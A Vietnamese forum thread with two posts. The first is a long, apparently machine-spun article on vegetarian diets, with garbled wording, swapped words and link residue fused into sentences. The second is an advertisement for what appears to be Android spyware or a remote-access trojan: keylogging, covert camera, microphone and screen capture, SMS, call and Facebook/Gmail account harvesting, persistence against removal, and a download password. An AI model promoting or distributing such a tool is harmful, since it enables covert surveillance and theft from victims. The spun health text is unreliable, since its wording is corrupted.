Những điều cần biết về chế độ ăn chay

Chủ đề thuộc danh mục 'Bán nhà đất' được đăng bởi camnangungthu, 19/6/21.

Tags:
  1. camnangungthu

    camnangungthu Thành viên cấp 1

    những người dân theo phép tắc ăn chay không ăn thịt hoặc cá nhưng rất có thể liên tục ăn trứng và các dịch vụ từ sữa.

    Một người không nhất thiết phải ăn thịt để tạo ra được kể cả các chất dinh dưỡng cần thiết cho sự khỏe mạnh tốt. qui định ăn không còn thịt rất có khả năng kéo theo sức lực càng tốt vì một số căn do.

    ăn chay vẫn đủ chất

    Một duyên cớ là nhiều người theo phép tắc dùng đồ chay có xu hướng tiêu thụ một tỷ lệ lớn thức ăn tươi, lành mạnh, có nguồn gốc từ cây trồng, cung cấp chất chống lão hóa và chất xơ. Khi một người đưa ra quyết định theo nguyên tắc ăn không có thịt, họ thường biến thành lành mạnh và tích cực hơn trong những công việc đưa ra các lựa chọn lành mạnh toàn diện và tổng thể.

    Nhiều nghiên cứu chấp nhận rằng nguyên lý dùng đồ chay có thể mang lại đa chức năng cho sức lực.

    Các nghiên cứu và điều tra cho thấy hiệ tượng ăn ngay chay hoặc dùng đồ chay có thể làm giảm khả năng mắc bệnh về tim mạch và nhiều loại các bệnh ung thư .

    lý lẽ không ăn không uống không thịt Có thể giảm nguy cơ mắc hội chứng chuyển hóa, bao gồm tất cả béo phì và tiểu đường loại 2 .

    Theo một cuộc thăm dò của Gallup năm 2019 , 5% dân ở Đất nước Hoa Kỳ bộc lộ mình là kẻ không ăn mặn, bao gồm tất cả 2% người từ 55 tuổi trở lên trên, 8% người từ 18–34 tuổi và 7% người từ 35–54.

    Bài viết này sẽ tập trung vào cơ chế dùng đồ chay lacto-ovo, bao gồm tất cả các căn hộ từ sữa và trứng.

    Thực đơn ăn uống lành mạnh

    Người dùng đồ chay ăn những thực phẩm gì?

    phương pháp dùng đồ chay có thể bán loại đồ ăn bồi bổ, tốt cho sức khỏe, nhưng những gì người đó ăn sẽ phụ thuộc vào loại chính sách ăn ít mà họ đang làm theo và tuyển lựa các loại thức ăn cá nhân của mình.

    có nhiều cơ chế ăn ít khác nhau được gọi là ăn chay:
    • những người dùng đồ chay lacto-ovo tránh cả thịt và cá nhưng hấp phụ sữa và trứng.
    • Người ăn chay lacto hấp phụ các sản phẩm từ sữa nhưng không có trứng.
    • những người dân dùng đồ chay trường ăn trứng nhưng vẫn không ăn sữa.

    1 số ít người không ăn thịt sẽ ăn cá. Đây là một cách thức nhịn ăn pescatarian, chứ không cần phải là một lý lẽ ăn chay.

    vẻ ngoài ăn luôn chay không bao gồm đồ ăn có nguồn gốc động vật.

    những người dân theo lý lẽ dùng đồ chay phải tuyển lựa cẩn trọng về những gì họ ăn để đảm bảo rằng chúng cung ứng các nên bồi bổ của mình. 1 số ít người rất có thể cần bổ sung.

    để tìm hiểu thêm các khoáng sản được có khoa học hỗ trợ về bổ dưỡng, hãy truy nhập chiếc rốn chuyên dùng của nó tôi .

    Những ích lợi ăn chay

    Theo cuộc khảo sát của Gallup, càng ngày càng có đa số người trẻ áp chế cơ chế ăn chay.

    Họ rất có khả năng làm điều đó cùng vì:


    • nó mang lại lợi ích cho sức lực
    • nó là một quyết định chọn lựa chắc chắn hơn về mặt sinh thái xanh
    • họ quan tâm đến việc cư xử với động vật
    • nó là một phần của sự sàng lọc lối sống rộng rãi hơn

    một số người cũng tránh thịt và các dịch vụ loài vật vì nguyên nhân tôn giáo.

    Dưới đây là vài cách tránh mọi căn hộ từ thịt có khả năng tăng cường sự khỏe mạnh của một người.

    trọng lượng : chuyển hẳn sang hình thức dùng đồ chay rất có khả năng giúp một người sụt cân, thấp nhất là trong thời gian ngắn, theo một năm 2016phân tích tổng hợpNguồn tin cậy. Các nhà khoa học cần sử dụng các nghiên cứu có kiểm soát và điều hành lâu dài để tìm hiểu chính sách không ăn mặn có thể ảnh hưởng tác động đến trọng lượng cần làm gi.

    Cholesterol : Ađánh giá có hệ thốngNguồn tin cậycông bố vào năm 2015 kết luận rằng những người dân theo bề ngoài không ăn mặn có chức năng có mức cholesterol tổng thể và toàn diện ít hơn .

    ung thư : AhọcNguồn tin cậydữ liệu của gần 70.000 người đã đưa ra bằng chứng cho thấy phần trăm mắc các bệnh ung thư nói chung ở những người dân dùng đồ chay ít hơn những người không ăn chay. Các Author cho là lý lẽ ăn không thịt có thể bảo vệ khỏi bệnh ung thư.

    sức khỏe tim mạch : tác giả của năm 2014họcNguồn tin cậynhận thấy nguy cơ mắc bệnh đường tim mạch ít hơn ở những người theo vẻ ngoài ăn chay ở Ấn Độ. Các nghiên cứu và điều tra ở những nước Châu mỹ cũng cho hiệu quả tương tự.

    Bệnh tiểu đường : những người dân theo vẻ ngoài không ăn mặn rất có khả năng bịít có khả năngNguồn tin cậymắc bệnh tiểu đường loại 2. Một duyên do cho điều đó có thể bởi vì lượng ngũ cốc nguyên hạt, trái cây, rau, các loại đậu và các loại hạt, và lượng chất béo không còn lợi cho sự khỏe mạnh tiết kiệm hơn.

    Những tác dụng này sẽ không auto diễn ra Khi một người ngừng ăn thịt. cạnh bên chính sách dùng đồ chay, mình cần đảm bảo:




    • lấy đúng số lượng calo
    • chú ý vào các loại củ quả, rau và các loại hạt ngũ cốc nguyên hạt
    • không nên ăn các loại thực phẩm chế biến sẵn và rượu
    • tránh chất béo vô ích cho sức lực và thêm đường và muối
    • dấn mình vào vào trong 1 cách sống mạnh khỏe tổng thể, với khá nhiều tập thể dục
    • tránh hút thuốc lá

    Những lợi ích sức khỏe của chính sách ăn luôn chay là gì?

    Sự bền vững

    Ngoài những ích lợi về sức lực, các nhà cho biết nguyên lý ăn xác định vào cây trồng bền vững hơn, vì nó ít gây hại cho thể tích hơn phân tích lý lẽ ăn dựa trên thịt.

    Thực phẩm tăng cường hệ miễn dịch

    Mẹo để bước đầu dùng đồ chay

    ở đây là một số mẹo để chuyển hẳn qua cơ chế ăn chay:




    • Bắt đầu tìm hiểu về các chất dinh dưỡng thiết yếu và cách lấy chúng.
    • Nhận một số mẹo và bí quyết thổi nấu từ các trang web dành cho tất cả những người không ăn mặn, shop thức ăn tốt cho sức khỏe địa phương hoặc chuyên viên bồi bổ.
    • Lập chiến lược mua sắm và ăn uống mỗi tuần.
    • lưu ý vào món ăn không có thịt để chào bán rất nhiều protein, để bạn không ăn uống nhiều như trước mà chỉ bỏ thịt.
    • Hãy xem xét sử dụng biến hóa dần dần, chẳng hạn trong hơn một tháng.
    • Bắt đầu với các loại thức ăn không có thịt thân quen, chẳng hạn như mac, pho mát và salad, và chế tạo danh mục của bạn theo thời gian.

    biến đổi thư thư rất có thể hoạt động càng đảm bảo hơn vì hai nguyên do:

    Nó có không ít năng lực trở thành một lối sống và một động thái lâu dài.

    biến hóa thực đơn bất ngờ đột ngột, ví dụ như tăng hấp phụ đậu hoặc rau, có thể kéo đến các vấn đề ăn ngon tạm bợ, chẳng hạn như bụng chướng.

    Các Viện bổ dưỡng và Dietetics có một loạt các lời khuyên cho tất cả những người muốn ngừng ăn thịt:

    Chọn các căn hộ các loại hạt toàn , chẳng hạn như bánh mì, gạo hoang dại hoặc nâu, và ngũ cốc nguyên hạt, vì chúng rất có thể chào bán B vitamin .

    Thay đổi hiệ tượng ăn , với các loại hạt ngũ cốc nguyên hạt, củ quả, rau, các loại đậu, các loại hạt, v.v.

    áp dụng trứng và các sản phẩm từ sữa một cách điều độ , hoặc thử thêm sữa đậu nành.

    Hỏi chuyên viên chăm sóc sự khỏe mạnh về hàm vị bổ sung , nhất là vitamin B-12.

    đảm bảo phân phối đủ lượng vitamin D , sáng tạo nếu ít tiếp xúc với ánh sáng hồng ngoại.

    soát sổ nhãn của các loại thực phẩm nhẹ chay “lành mạnh” để bảo vệ chúng không chứa nhiều đường, muối, hoặc lượng chất phụ gia khác.

    đừng quên rằng đồ ăn vặt và đồ ăn nhanh có thể không bổ dưỡng và đựng được nhiều calo, cho dù chúng có dùng đồ chay hay là không.

    Họ cũng kiến nghị giảm ăn nhiều đường và thức ăn uống nhiều chất béo.

    Các chất dinh dưỡng bạn cần khi ăn chay

    một số nhà khoa học nói rằng bề ngoài ăn chay hữu ích cho người thân ở mọi lứa tuổi, nhưng họ lưu ý rằng cần phải lên kế hoạch hợp lý để làm được được toàn bộ các chất dinh dưỡng rất cần thiết.

    Biểu đồ ở đây liệt kê một số chất dinh dưỡng mà một người theo phép tắc dùng đồ chay có thể thiếu , lượng chất dinh dưỡng mà một người cứng cáp buộc phải và một số ít rõ ràng về các loại thức ăn có chứa chúng. một số ít người Có thể cần bổ sung để tăng cường mức độ các chất dinh dưỡng này. cần thiết có thể gia tăng trong thai kỳ và nuôi con.


    Chất dinh dưỡngCần cho người lớn từ 19 tuổi trở lênNguồn

    Bàn là8–18Nguồn tin cậy miligam (mg)các loại đậu, bao gồm tất cả đậu, đậu xanh, đậu hũ đậu lăng, rau bina, hạt điều và đỗ xanh. tiêu thụ những thứ này cùng với vitamin C, giúp khung hình dung nạp chất sắt.

    Canxi1.000–1.200Nguồn tin cậy mgSữa chua, sữa, pho mát, đậu phụ, nước cam tăng cường, cải xoăn , củ cải xanh và bông cải xanh. Canxi cần thiết cho trẻ nhỏ và phụ nữ trong thời kỳ mãn kinh .

    Chất đạm46–56Nguồn tin tưởng gTrứng, sữa, sữa đậu nành, ngũ cốc, bơ hạt, hạt, đậu và các loại hạt. Các nguồn thực vật có thể không chứa protein hoàn hảo, Bởi vậy thành viên nên bảo vệ chào bán đủ của cả loại protein hàng ngày.

    Vitamin D15–20Nguồn tin cẩn microgam (mcg)Sữa bổ sung cập nhật, sữa đậu nành và ngũ cốc ăn sáng, cùng với việc chạm tới tia nắng mặt trời.

    Vitamin B-122,4Nguồn tin yêu mcgMen, trứng, các dịch vụ từ sữa, các loại thực phẩm bức tốc, chẳng hạn như các loại hạt ăn sáng.

    Kẽm8–11Nguồn tin tưởng mgCác dịch vụ từ sữa, các loại hạt ngũ cốc tăng cường, đậu khô, ngũ cốc và các sản phẩm từ đậu nành.

    Iốt150Nguồn tin tưởng mcgRong biển, hộp sữa chua, sữa, pho mát, bánh mỳ làm giàu, mì ống giàu dinh dưỡng, mận khô, đậu lima, sinh tố táo, đỗ xanh và chuối .


    chính sách không ăn mặn sẽ không đảm bảo sức khỏe tốt, nhưng nó có khả năng đóng góp phần vào việc gạn lọc thực đơn mạnh khỏe toàn diện. Một người vẫn cần bỏ ra những sàng lọc hữu dụng cho sức khỏe, chẳng hạn như tránh thêm đường và đồ ăn chế biến nhiều chất béo.

    phụ huynh và người quan tâm trẻ nhỏ theo cách thức dùng đồ chay phải phù hợp trẻ nhận thấy các dưỡng chất thiết yếu cho độ tuổi và thủ tục đi lên của chúng. vấn đề đó có thể bao gồm đảm bảo rằng trẻ không chỉ ăn bữa ăn gia đình trừ thịt.




    • rau xanh đậm
    • rau đỏ và cam
    • cây họ đậu
    • giàu tinh bột và các loại rau khác
    • các loại hạt ngũ cốc nguyên hạt và tinh luyện
    • các sản phẩm từ sữa
    • các loại thức ăn protein, chẳng hạn như trứng, các loại đậu, dịch vụ đậu nành, quả hạch và hạt
    • dầu

    phương pháp và ý tưởng phát minh không ăn mặn

    Nhiều sản phẩm chế biến có sẵn sẵn cho người mắc hoặc không cảm nhận đầy niềm tin vào kỹ năng thổi nấu của chính mình. Chúng bao gồm:




    • sản xuất sẵn các bữa tối (luôn đọc nhãn để chọn những chắt lọc tốt cho sức khỏe nhất)
    • bánh mì kẹp thịt và xúc xích làm từ các căn hộ sửa chữa thay thế thịt (chúng rất có khả năng chứa nhiều natri và chất béo)

    phần đông các chuyên gia hàng bây giờ đều cung cấp các lựa chọn không ăn mặn và thuần chay .

    mặc dù, đun nấu ở nhà thường ngắn hơn cùng một người có thể đảm bảo rằng họ Sử dụng các nguyên liệu tươi, bổ dưỡng.

    Tóm lược

    Theo học viện chuyên nghành bổ dưỡng và nhịn ăn , một hình thức ăn chay hoặc thuần chay bài bản tốt rất có khả năng có lợi cho sự khỏe mạnh người trong gia đình ở mọi công đoạn của đời sống.

    cách thức ăn dựa vào thực vật có thể giúp giảm nguy cơ bị bệnh tim , ung thư, tiểu đường loại 2, béo múp và các hoàn cảnh khác. đồ ăn có xuất phát từ thực vật cũng có định hướng bền chắc với thể tích hơn các loại thực phẩm có nguồn gốc từ động vật.

    Tuy nhiên, điều kỷ niệm là không ăn mặn sẽ không làm cho một người mạnh bạo trong một sớm 1 chiều. giúp xem sức khỏe được cải tổ, điều cần thiết là phải lập chiến lược tốt, được nhiều loại nguyên liệu và biến thực đơn trở thành một trong những phần của lối sống an lành tổng thể.

    Đối với những người muốn giảm lượng thịt nhưng cảm giác điều đó quá khó, chuyển đổi từ từ hoặc một phần có thể là một quyết định chọn lựa phù hợp.

    Các Hiệp hội Tim mạch Mỹ (AHA) bỏ ra đề xuất cho công việc đi không thịt, đặc biệt là đối với người muốn giảm mức cholesterol của họ và giảm nguy cơ bệnh về tim.
     
  2. walterhdownwi3

    walterhdownwi3 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     

Ủng hộ diễn đàn